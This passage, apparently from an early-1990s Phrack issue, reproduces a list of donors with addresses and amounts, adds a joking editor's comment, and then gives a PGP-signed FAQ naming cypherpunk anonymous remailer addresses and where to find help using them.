| American Newspaper Publishers |
| Association |
| The Newspaper CTR |
| 11600 Sunrise Valley |
| Reston, VA 22091 03/23/92 20,000 |
|
|
| Apple Computer |
| 20525 Mariani Avenue MS:75-61 |
| Cupertino, CA 95014 03/23/92 50,000 |
|
|
| Sun Microsystems, Inc |
| c/o Wayne Rosing |
| 2550 Garcia Ave |
| Mountain View, CA 94043-1100 04/03/92 50,000 |
|
|
| Adobe Systems, Inc. |
| c/o William Spaller |
| 1585 Charlestown Road |
| Mountain View, CA 94039-7900 04/16/92 10,000 |
|
|
| International Business Systems |
| c/o Robert Carbert, Rte 100 |
| Somers, NY 10589 05/07/92 50,000 |
|
|
| Prodigy Services Company |
| c/o G. Pera... |
| 445 Hamilton Avenue |
| White Plains, NY 10601 05/07/92 10,000 |
|
|
| Electronic Mail Associates |
| 1555 Wilson Blvd. Suite 300 |
| Arlington, VA 22209 05/13/92 10,000 |
|
|
| Microsoft |
| c/o William H. Neukom |
| 1 Microsoft Way |
| Redmond, VA 98052 06/25/92 50,000 |
|
|
| David Winer |
| 933 Hermosa Way |
| Menio Park, CA 94025 01/02/92 5,000 |
|
|
| Ed Venture Holdings |
| c/o Ester Dvson |
| 375 Park Avenue |
| New York, NY 10152 03/23/92 15,000 |
|
|
| Anonymous 12/26/91 10,000 |
|
|
| Bauman Fund |
| c/o Patricia Bauman |
| 1731 Connecticut Avenue |
| Washington, DC 20009-1146 04/16/92 2,500 |
|
|
| Capital Cities ABA |
| c/o Mark MacCarthy |
| 2445 N. Street, NW Suite 48 |
| Washington, DC 20037 05/04/92 1,000 |
|
|
| John Gilmore |
| 210 Clayton Street |
| San Francisco, CA 94117 07/23/91 1,488 |
| 08/06/91 100,000 |
|
|
| Government Technology 10/08/91 1,000 |
|
|
| Miscellaneous 04/03/91 120 |
|
|
| Apple Writers Grant |
| c/o Apple Computer |
| 20525 Mariani Avenue 01/10/92 15,000 |
|
|
|
|
| [Editor: Well, hmmm. Tell you guys what: Send Phrack that |
| much money and we will give up our ideals and move to |
| a new location, and forget everything about what we |
| were all about in the beginning. In fact, we will turn |
| our backs on it. Fair? |
|
|
| I was talking about me moving to Europe and giving |
| up computers. Don't read anything else into that. Nope.] |
|
|
| **************************************************************************** |
|
|
| -----BEGIN PGP SIGNED MESSAGE----- |
|
|
| Q1: What cypherpunk remailers exist? |
|
|
| A1: |
|
|
| 1: hh@pmantis.berkeley.edu |
| 2: hh@cicada.berkeley.edu |
| 3: hh@soda.berkeley.edu |
| 4: nowhere@bsu-cs.bsu.edu |
| 5: remail@tamsun.tamu.edu |
| 6: remail@tamaix.tamu.edu |
| 7: ebrandt@jarthur.claremont.edu |
| 8: hal@alumni.caltech.edu |
| 9: remailer@rebma.mn.org |
| 10: elee7h5@rosebud.ee.uh.edu |
| 11: phantom@mead.u.washington.edu |
| 12: hfinney@shell.portal.com |
| 13: remailer@utter.dis.org |
| 14: 00x@uclink.berkeley.edu |
| 15: remail@extropia.wimsey.com |
|
|
| NOTES: |
| #1-#6 remail only, no encryption of headers |
| #7-#12 support encrypted headers |
| #15 special - header and message must be encrypted together |
| #9,#13,#15 introduce larger than average delay (not direct connect) |
| #14 public key not yet released |
|
|
| #9,#13,#15 running on privately owned machines |
|
|
| ====================================================================== |
|
|
| Q2: What help is available? |
|
|
| A2: |
|
|
| Check out the pub/cypherpunks directory at soda.berkeley.edu |
| (128.32.149.19). Instructions on how to use the remailers are in the |
| remailer directory, along with some unix scripts and dos batch files. |
|
|
| Mail to me (elee9sf@menudo.uh.edu) for further help and/or questions. |
|
|
| ====================================================================== |
|
|
|
|
| -----BEGIN PGP SIGNATURE----- |
| Version: 2.2 |
|
|
| iQCVAgUBLAulOYOA7OpLWtYzAQHLfQP/XDSipOUPctZnqjjTq7+665MWgysE1ex9 |
| lh3Umzk2Q647KyqhoCo8f7nVrieAZxK0HjRFrRQnQCwjTSQrve2eAQ1A5PmJjyiI |
| Y55E3YIXYmKrQekIHUKaMyATfnhNc6+2MT8mwaWz2kiOTRkun/SlNI3Cv3Qt8Emy |
| Y6Zv0kk/7rs= |
| =simY |
| -----END PGP SIGNATURE----- |
|
|
| [Editor: We suggest that everyone go ahead and get the info file from |
| soda.berkeley.edu's ftp site. While you are there, |
| take a look around. Lots of groovy free stuff.] |
| |
|
|